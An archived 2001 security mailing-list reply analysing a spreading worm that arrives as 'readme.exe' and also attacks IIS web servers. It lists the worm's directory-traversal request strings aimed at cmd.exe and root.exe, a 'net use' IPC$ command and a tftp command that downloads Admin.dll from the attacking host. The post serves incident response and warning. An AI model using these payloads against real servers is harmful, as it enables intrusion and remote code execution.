Security Incidents mailing list archives

Re: New worm ??

From: "Jay D. Dyson" <jdyson () treachery net>
Date: Tue, 18 Sep 2001 09:14:47 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Sep 2001, Cory McIntire wrote:

I and a few others I know are getting bombard on our machines with IIS
requests....looks like another worm, and its much smarter than before,
it seems to stay within the same class A and sometimes the same class B
as the attacking machine is in. here is an excerpt of what i believe is
the full scan....


        Here's what I've been able to determine thus far:

        There is an e-mail worm propagating right now that comes with the
payload 'readme.exe'.  I suspect this e-mail worm preys on Outlook MUAs,
but I have no confirmation of this since the e-mails I've received have
been bounces.  (Whoever released one iteration of this worm has the "From"
address as 'staff () attrition org'.)

        This payload does a load of things to assure its propagation.
However, it differs from other email-based worms in that it also launches
a number of web-based attacks.  Namely:

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

        As can be seen above, it also attempts to make a tftp retrieval
for Admin.dll.

        *sigh*  Yet another worm made possible by the insecurity of
Microsoft.

- -Jay

  (    (                                                          _______
  ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) |    = |-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6dk6rlDRyqRQ2a9AQGaKwQAlDjzzfpgW0vqzLIjHj+z4rGJSYf4S8u6
adoqIruHbsmg+UpeeZsvSzmwnGzyKejmhPEo8QqTVtdh3aldssaDgoMLBAU+ryBE
2d38EPCG4Y/mGdd8mmCCYqtZu37oy4ZTmURiG9oOdERFFQ7y3W4IQUE8VifiAOCq
di6p4ruu1Ic=
=kS6c
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

New worm ?? Cory McIntire (Sep 18)
- Re: New worm ?? Jay D. Dyson (Sep 18)
- RE: New worm ?? Olivier DEMBOUR (Sep 18)
- Re: New worm ?? Pedro Miller Rabinovitch (Sep 18)